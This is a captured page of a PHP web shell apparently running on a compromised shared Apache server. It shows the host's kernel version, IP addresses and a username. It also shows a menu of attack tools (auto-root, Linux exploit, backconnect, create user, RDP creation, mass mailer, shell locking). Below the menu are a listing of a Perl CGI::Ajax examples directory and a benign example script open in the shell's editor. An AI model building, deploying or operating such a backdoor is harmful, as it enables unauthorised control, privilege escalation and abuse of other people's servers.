Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libcgi-ajax-perl /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
CGI-Application-Ajax-ex01.pl
930
B
-rwxr-xr-x
CGI-Application-Ajax-ex02.pl
1015
B
-rwxr-xr-x
CGI-Application-Ajax-ex03.pl
1.76
KB
-rwxr-xr-x
convert_degrees.pl
969
B
-rw-r--r--
pjx_JSON.pl
1.17
KB
-rwxr-xr-x
pjx_JSON_out.pl
286
B
-rwxr-xr-x
pjx_NO_CACHE_callee.pl
239
B
-rwxr-xr-x
pjx_NO_CACHE_caller.pl
1.15
KB
-rwxr-xr-x
pjx_callback.pl
1.35
KB
-rwxr-xr-x
pjx_chained.pl
1.11
KB
-rwxr-xr-x
pjx_change_encoding.pl
869
B
-rwxr-xr-x
pjx_change_headers.pl
778
B
-rwxr-xr-x
pjx_checkbox.pl
677
B
-rwxr-xr-x
pjx_combo.pl.gz
1.96
KB
-rw-r--r--
pjx_cr.pl
1.43
KB
-rwxr-xr-x
pjx_dynselect.pl
3.25
KB
-rwxr-xr-x
pjx_formDump.pl
1.3
KB
-rwxr-xr-x
pjx_from_span.pl
1.2
KB
-rwxr-xr-x
pjx_loading.pl
1.7
KB
-rwxr-xr-x
pjx_manyret.pl
2.06
KB
-rwxr-xr-x
pjx_nobuild.pl
727
B
-rwxr-xr-x
pjx_objects_2_url.pl
1.28
KB
-rwxr-xr-x
pjx_podex.pl
1.82
KB
-rwxr-xr-x
pjx_radio.pl
1.29
KB
-rwxr-xr-x
pjx_splitargs.pl
1.17
KB
-rwxr-xr-x
pjx_subs.pl
1.42
KB
-rwxr-xr-x
pjx_url.pl
971
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pjx_NO_CACHE_caller.pl
#! /usr/bin/perl -w # this is an script calls an external script and avoids caching: # NB The CGI::Ajax object must come AFTER the coderefs are declared. use strict; use CGI::Ajax; use CGI; my $q = new CGI; my $Show_Form = sub { my $html = ""; $html .= <<EOT; <HTML><title>CGI::Ajax No_Cache Example</title> <HEAD> </HEAD> <BODY> <i> If the same URL is requested, A browser may cache the result and return it without querying the requested URL. To avoid that, use the 'NO_CACHE' keyword as a parameter in your javascript function. </i><br/> <form> Click the button and a perl script 'pjx_NO_CACHE_callee.pl should return the current time:<br/><br/> <input type="button" id="b1" size="6" value='This will cache (in IE)' onclick="perl_script([], ['out1']);return false"><br/> <input type="button" id="b2" size="6" value='This will NOT cache' onclick="perl_script(['NO_CACHE'], ['out1']);"><br/> New Time:<input type=text id="out1"> </form> </BODY> </HTML> EOT return $html; }; my $pjx = CGI::Ajax->new( 'perl_script' => 'pjx_NO_CACHE_callee.pl'); $pjx->JSDEBUG(1); $pjx->DEBUG(1); print $pjx->build_html($q,$Show_Form); # this outputs the html for the page
Close